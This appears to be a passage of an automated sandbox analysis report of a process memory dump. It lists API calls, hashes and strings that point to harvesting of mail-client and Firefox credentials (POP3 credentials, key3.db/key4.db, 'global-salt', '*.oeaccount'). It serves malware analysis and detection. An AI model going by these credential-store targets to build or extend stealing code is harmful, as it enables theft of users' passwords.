                                • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                • memset.MSVCRT ref: 004058C3
                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                • SetFocus.USER32(?), ref: 00405976
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$FocusItemmemset
                                • String ID:
                                • API String ID: 4281309102-0
                                • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                APIs
                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                • _mbscat.MSVCRT ref: 0040A8FF
                                • sprintf.MSVCRT ref: 0040A921
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileWrite_mbscatsprintfstrlen
                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                • API String ID: 1631269929-4153097237
                                • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                APIs
                                • memset.MSVCRT ref: 0040810E
                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                • String ID: POP3_credentials$POP3_host$POP3_name
                                • API String ID: 524865279-2190619648
                                • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: key3.db$key4.db
                                • API String ID: 581844971-3557030128
                                • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ItemMenu$CountInfomemsetstrchr
                                • String ID: 0$6
                                • API String ID: 2300387033-3849865405
                                • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                APIs
                                • memcpy.MSVCRT ref: 004108C3
                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                • memcpy.MSVCRT ref: 00410961
                                Strings
                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FromStringUuidmemcpy
                                • String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
                                • API String ID: 2685851527-202910704
                                • Opcode ID: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                • Instruction ID: d39aacb0d07447bcfd979039f79cad875a94fb0475638bd6baea4f5a046d65b4
                                • Opcode Fuzzy Hash: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                • Instruction Fuzzy Hash: 6B2192B391411DAAEF11AF61DD40EEF3BACEF15354F004023F956E6211E6B8D981CBA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpystrlen$memsetsprintf
                                • String ID: %s (%s)
                                • API String ID: 3756086014-1363028141
                                • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscat$memsetsprintf
                                • String ID: %2.2X
                                • API String ID: 125969286-791839006
                                • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                APIs
                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                  • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                • CloseHandle.KERNEL32(?), ref: 00444206
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                • String ID: ACD
                                • API String ID: 1886237854-620537770
                                • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                APIs
                                • memset.MSVCRT ref: 004091EC
                                • sprintf.MSVCRT ref: 00409201
                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                • String ID: caption$dialog_%d
                                • API String ID: 2923679083-4161923789
                                • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                APIs
                                Strings
                                • unknown error, xrefs: 004277B2
                                • no such savepoint: %s, xrefs: 00426A02
                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                • abort due to ROLLBACK, xrefs: 00428781
                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                • API String ID: 3510742995-3035234601
                                • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                • API String ID: 2221118986-3608744896
                                • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                APIs
                                • memcpy.MSVCRT ref: 00442A5E
                                  • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmpmemcpy
                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                • API String ID: 1784268899-4153596280
                                • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                • memset.MSVCRT ref: 00410246
                                • memset.MSVCRT ref: 00410258
                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                • memset.MSVCRT ref: 0041033F
                                • _mbscpy.MSVCRT ref: 00410364
                                • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                • String ID:
                                • API String ID: 3974772901-0
                                • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                APIs
                                • wcslen.MSVCRT ref: 0044406C
                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                • strlen.MSVCRT ref: 004440D1
                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                • memcpy.MSVCRT ref: 004440EB
                                • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                • String ID:
                                • API String ID: 577244452-0
                                • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                APIs
                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                • _strcmpi.MSVCRT ref: 00404518
                                • _strcmpi.MSVCRT ref: 00404536
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _strcmpi$memcpystrlen
                                • String ID: imap$pop3$smtp
                                • API String ID: 2025310588-821077329
                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                APIs
                                • memset.MSVCRT ref: 0040C02D
                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                  • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                • API String ID: 2726666094-3614832568
                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                APIs
                                • memset.MSVCRT ref: 00403A88
                                • memset.MSVCRT ref: 00403AA1
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,?,?,?), ref: 00403AB8
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                • strlen.MSVCRT ref: 00403AE9
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                • String ID:
                                • API String ID: 1786725549-0
                                • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                APIs
                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                • GetLastError.KERNEL32 ref: 0040C1CA
                                • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                • String ID:
                                • API String ID: 2014771361-0
                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                APIs
                                • memcmp.MSVCRT ref: 00406151
                                  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                  • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                • memcmp.MSVCRT ref: 0040617C
                                • memcmp.MSVCRT ref: 004061A4
                                • memcpy.MSVCRT ref: 004061C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID: global-salt$password-check
                                • API String ID: 231171946-3927197501
                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                                • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                APIs
                                • GetClientRect.USER32(?,?), ref: 004016A3
                                • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                • BeginPaint.USER32(?,?), ref: 004016D7
                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                • EndPaint.USER32(?,?), ref: 004016F3
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                • String ID:
                                • API String ID: 19018683-0
                                • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                APIs
                                • memset.MSVCRT ref: 0040644F
                                • memcpy.MSVCRT ref: 00406462
                                • memcpy.MSVCRT ref: 00406475
                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                  • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                • memcpy.MSVCRT ref: 004064B9
                                • memcpy.MSVCRT ref: 004064CC
                                • memcpy.MSVCRT ref: 004064F9
                                • memcpy.MSVCRT ref: 0040650E
                                  • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID:
                                • API String ID: 438689982-0
                                • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
